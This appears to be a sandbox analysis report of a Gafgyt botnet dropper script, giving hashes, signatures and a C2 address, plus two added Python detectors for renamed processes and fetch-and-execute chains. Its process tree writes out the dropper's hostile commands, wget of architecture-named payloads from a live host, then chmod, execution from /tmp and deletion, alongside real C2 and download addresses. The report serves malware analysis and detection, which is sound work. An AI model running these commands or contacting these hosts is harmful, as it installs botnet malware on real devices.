Analysis
- max time kernel: 145s
- max time network: 172s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 04/08/2024, 13:39
Static task
- static1
Behavioral tasks
- behavioral1: sample sex.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample sex.sh, resource debian9-armhf-20240611-en
- behavioral3: sample sex.sh, resource debian9-mipsbe-20240611-en
General
- Target: sex.sh
- Size: 1KB
- MD5: 4a5211253d90ad66dea73ffa8809bbd8
- SHA1: 27c91298804fd2e46e280d4259170e6a48e4280d
- SHA256: bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276
- SHA512: a844fe1fdd89254ff069b0bc3fa3b5812936f9560f693cd6c5658f4232f42efc9e926a3d51bd152a16283c8ab322967f6f7686f536ea395047477661b9aad0eb
Malware Config
- Extracted
  Family: gafgyt
  C2: 5.252.177.70:23
Signatures
- Detected Gafgyt variant (1 IoC)
  Resource: behavioral2/files/fstream-1.dat
  YARA rule: family_gafgyt
- Executes dropped EXE (1 IoC)
  IoC: /tmp/arm61
  PID: 731
  Process: arm61
- Changes its process name (1 IoC)
  Description: Changes the process name, possibly in an attempt to hide itself
  PID: 731
  Process: arm61
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  Description: File opened for modification
  IoC: /tmp/arm61
  Process: wget
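The sandbox flags PID 731 (arm61) for changing its process name and for being a dropped executable in /tmp that the script removes right after launching it. The check below is added here as an example; it is not sandbox code and not code from the sample. It is what a responder would run on a suspect Linux host: compare the kernel's comm and argv[0] against the binary actually mapped at /proc/<pid>/exe, and note when that binary has been unlinked (readlink reports it with a " (deleted)" suffix) or lives in a world-writable directory. The SAMPLES records are constructed; the page does not say which name the sample adopted, so "httpd" is a placeholder.

```python
import os

# World-writable directories that IoT droppers favour for staged binaries.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
COMM_MAX = 15  # the kernel truncates comm to TASK_COMM_LEN - 1 characters


def name_mismatch(comm, exe_link, argv):
    """Compare a process's presented identity with its mapped executable.

    comm     - contents of /proc/<pid>/comm without the trailing newline
    exe_link - readlink() of /proc/<pid>/exe; the kernel appends " (deleted)"
               when the file has been unlinked since exec
    argv     - /proc/<pid>/cmdline split on NUL
    Returns a list of findings; an empty list means nothing looks off."""
    findings = []
    deleted = exe_link.endswith(" (deleted)")
    exe_path = exe_link[:-len(" (deleted)")] if deleted else exe_link
    exe_name = os.path.basename(exe_path)

    if comm != exe_name[:COMM_MAX]:
        findings.append(f"comm {comm!r} does not match executable {exe_name!r}")
    if argv:
        # Login shells prefix argv[0] with "-" ("-bash"); strip it before comparing.
        argv0 = os.path.basename(argv[0]).lstrip("-")
        if argv0 and argv0 != exe_name:
            findings.append(f"argv[0] {argv[0]!r} does not match executable {exe_name!r}")
    if deleted:
        findings.append(f"executable {exe_path!r} was unlinked after launch")
    if exe_path.startswith(SCRATCH_DIRS):
        findings.append(f"executable runs from world-writable directory {exe_path!r}")
    return findings


def scan_proc(proc="/proc"):
    """Apply name_mismatch to every readable process; returns {pid: findings}.
    Run as root to see other users' processes. Kernel threads have no exe
    link and are skipped, as is anything that cannot be read."""
    results = {}
    try:
        entries = os.listdir(proc)
    except OSError:
        return results
    for entry in entries:
        if not entry.isdigit():
            continue
        base = os.path.join(proc, entry)
        try:
            with open(os.path.join(base, "comm")) as f:
                comm = f.read().rstrip("\n")
            exe_link = os.readlink(os.path.join(base, "exe"))
            with open(os.path.join(base, "cmdline"), "rb") as f:
                argv = [a.decode("utf-8", "replace") for a in f.read().split(b"\0") if a]
        except OSError:
            continue
        findings = name_mismatch(comm, exe_link, argv)
        if findings:
            results[int(entry)] = findings
    return results


# Constructed sample records (not from the report): a clean daemon, a login
# shell, and a process modelled on PID 731, which ran /tmp/arm61, was deleted
# by the script, and renamed itself. The adopted name "httpd" is hypothetical.
SAMPLES = {
    1234: ("sshd", "/usr/sbin/sshd", ["/usr/sbin/sshd", "-D"]),
    2000: ("bash", "/usr/bin/bash", ["-bash"]),
    731:  ("httpd", "/tmp/arm61 (deleted)", ["httpd"]),
}


def check_samples():
    """Run the check over the constructed records; {pid: findings}."""
    return {pid: name_mismatch(*rec) for pid, rec in SAMPLES.items()}


if __name__ == "__main__":
    for pid, findings in check_samples().items():
        print(pid, findings or "ok")
    for pid, findings in scan_proc().items():
        print(pid, findings)
```

On BusyBox-based devices, which is where Gafgyt usually lands, every applet reports exe /bin/busybox while argv[0] is the applet name, so the argv[0] test needs an allow-list there; the " (deleted)" and scratch-directory findings carry most of the weight on such hosts.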
Processes
- /tmp/sex.sh  (cmdline: /tmp/sex.sh)  PID 668
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/mips)  PID 670
  - /bin/chmod  (cmdline: chmod +x mips)  PID 687
  - /tmp/mips  (cmdline: ./mips)  PID 689
  - /bin/rm  (cmdline: rm -rf mips)  PID 690
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/mipsel)  PID 693
  - /bin/chmod  (cmdline: chmod +x mipsel)  PID 700
  - /tmp/mipsel  (cmdline: ./mipsel)  PID 701
  - /bin/rm  (cmdline: rm -rf mipsel)  PID 702
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/sh4)  PID 703
  - /bin/chmod  (cmdline: chmod +x sh4)  PID 705
  - /tmp/sh4  (cmdline: ./sh4)  PID 706
  - /bin/rm  (cmdline: rm -rf sh4)  PID 707
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/x86)  PID 708
  - /bin/chmod  (cmdline: chmod +x x86)  PID 709
  - /tmp/x86  (cmdline: ./x86)  PID 710
  - /bin/rm  (cmdline: rm -rf x86)  PID 711
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/arm61)  PID 712  [Writes file to tmp directory]
  - /bin/chmod  (cmdline: chmod +x arm61)  PID 729
  - /tmp/arm61  (cmdline: ./arm61)  PID 731  [Executes dropped EXE; Changes its process name]
  - /bin/rm  (cmdline: rm -rf arm61)  PID 734
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/i686)  PID 736
  - /bin/chmod  (cmdline: chmod +x i686)  PID 743
  - /tmp/i686  (cmdline: ./i686)  PID 745
  - /bin/rm  (cmdline: rm -rf i686)  PID 746
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/ppc)  PID 747
  - /bin/chmod  (cmdline: chmod +x ppc)  PID 755
  - /tmp/ppc  (cmdline: ./ppc)  PID 757
  - /bin/rm  (cmdline: rm -rf ppc)  PID 758
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/586)  PID 759
  - /bin/chmod  (cmdline: chmod +x 586)  PID 768
  - /tmp/586  (cmdline: ./586)  PID 771
  - /bin/rm  (cmdline: rm -rf 586)  PID 773
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/m68k)  PID 774
  - /bin/chmod  (cmdline: chmod +x m68k)  PID 778
  - /tmp/m68k  (cmdline: ./m68k)  PID 780
  - /bin/rm  (cmdline: rm -rf m68k)  PID 781
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/dc)  PID 782
  - /bin/chmod  (cmdline: chmod +x dc)  PID 783
  - /tmp/dc  (cmdline: ./dc)  PID 784
  - /bin/rm  (cmdline: rm -rf dc)  PID 785
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/dss)  PID 786
  - /bin/chmod  (cmdline: chmod +x dss)  PID 792
  - /tmp/dss  (cmdline: ./dss)  PID 794
  - /bin/rm  (cmdline: rm -rf dss)  PID 795
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/co)  PID 796
  - /bin/chmod  (cmdline: chmod +x co)  PID 803
  - /tmp/co  (cmdline: ./co)  PID 805
  - /bin/rm  (cmdline: rm -rf co)  PID 806
  - /usr/bin/wget  (cmdline: wget http://216.172.177.16/scar)  PID 808
  - /bin/chmod  (cmdline: chmod +x scar)  PID 814
  - /tmp/scar  (cmdline: ./scar)  PID 816
  - /bin/rm  (cmdline: rm -rf scar)  PID 817
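The process tree above is the entire downloader: for each architecture-named file it runs wget against 216.172.177.16, chmod +x, executes the file from /tmp by relative path, and then rm's it. The following is an added example of detection logic over process records in that shape; it is not sandbox code and not code from the sample. It groups children by parent, pairs each fetch with an execution of the same file under /tmp, and reduces the matches to indicators (download host, URLs, dropped paths, plus the C2 taken from the extracted config rather than inferred). The EVENTS list is constructed from a subset of the tree, with one made-up benign download (PID 900) to show that a fetch without an execution does not fire.

```python
import os
from urllib.parse import urlparse

# Constructed process records in the shape of the sandbox tree above:
# (pid, parent pid, executable, command line). A subset of the tree plus
# one made-up benign download (pid 900); not sandbox output.
EVENTS = [
    (668, 1,   "/tmp/sex.sh",   "/tmp/sex.sh"),
    (670, 668, "/usr/bin/wget", "wget http://216.172.177.16/mips"),
    (687, 668, "/bin/chmod",    "chmod +x mips"),
    (689, 668, "/tmp/mips",     "./mips"),
    (690, 668, "/bin/rm",       "rm -rf mips"),
    (712, 668, "/usr/bin/wget", "wget http://216.172.177.16/arm61"),
    (729, 668, "/bin/chmod",    "chmod +x arm61"),
    (731, 668, "/tmp/arm61",    "./arm61"),
    (734, 668, "/bin/rm",       "rm -rf arm61"),
    (900, 1,   "/usr/bin/wget", "wget https://deb.debian.org/debian/dists/bookworm/Release"),
]

# Fetchers commonly seen in IoT droppers; extend for your environment.
FETCHERS = {"wget", "curl", "tftp", "ftpget"}


def classify(exe, cmdline, cwd):
    """Map one process record to (stage, artefact name, url), where stage is
    fetch / chmod / exec / rm, or return None if the record is none of those."""
    argv = cmdline.split()
    tool = os.path.basename(exe)
    if tool in FETCHERS:
        urls = [a for a in argv[1:] if "://" in a]
        if not urls:
            return None
        return ("fetch", os.path.basename(urlparse(urls[0]).path), urls[0])
    if tool == "chmod" and len(argv) >= 3 and ("x" in argv[1] or argv[1].isdigit()):
        return ("chmod", os.path.basename(argv[-1]), None)
    if tool == "rm" and len(argv) >= 2:
        return ("rm", os.path.basename(argv[-1]), None)
    # Execution of a file living under cwd that was started by relative path.
    if exe.startswith(cwd + "/") and argv and argv[0].startswith("./"):
        return ("exec", os.path.basename(exe), None)
    return None


def find_dropper_chains(events, cwd="/tmp"):
    """Walk each parent's children in PID order and report every artefact that
    was both fetched and executed from cwd by that parent. The chmod and rm
    stages are recorded when present; the rm is the self-cleanup tell."""
    by_parent = {}
    for pid, ppid, exe, cmd in sorted(events):
        by_parent.setdefault(ppid, []).append((pid, exe, cmd))
    chains = []
    for ppid, kids in by_parent.items():
        seen = {}
        for pid, exe, cmd in kids:
            hit = classify(exe, cmd, cwd)
            if hit is None:
                continue
            stage, name, url = hit
            entry = seen.setdefault(name, {"name": name, "path": f"{cwd}/{name}",
                                           "parent": ppid, "stages": set(),
                                           "pids": [], "url": None})
            entry["stages"].add(stage)
            entry["pids"].append(pid)
            if url:
                entry["url"] = url
        chains.extend(e for e in seen.values() if {"fetch", "exec"} <= e["stages"])
    return chains


def extract_iocs(chains, c2=None):
    """Reduce detected chains to indicators. c2 is supplied from the extracted
    malware config (the report gives 5.252.177.70:23), not derived here."""
    iocs = {
        "download_hosts": sorted({urlparse(c["url"]).hostname for c in chains}),
        "urls": sorted(c["url"] for c in chains),
        "dropped_paths": sorted(c["path"] for c in chains),
    }
    if c2:
        iocs["c2"] = c2
    return iocs


if __name__ == "__main__":
    found = find_dropper_chains(EVENTS)
    for c in found:
        print(f"parent {c['parent']}: {c['path']} fetched from {c['url']}, "
              f"stages {sorted(c['stages'])}, pids {c['pids']}")
    print(extract_iocs(found, c2="5.252.177.70:23"))
```

The same four fields (pid, ppid, exe, cmdline) are present in auditd execve records, eBPF exec tracers and most EDR process-creation events, so the classifier can be fed from any of them. Note that the sandbox also recorded execs of the non-ARM binaries (mips, sh4, x86, ...) on an armhf guest; a detector keyed on the fetch and exec pair, rather than on a successful run, catches the chain regardless of whether each payload could actually execute.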
Network
MITRE ATT&CK Matrix
Downloads
- Filesize: 136KB
  MD5: 6820e48a7c8f9b287da8f0593b0a8f83
  SHA1: 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
  SHA256: eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
  SHA512: 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c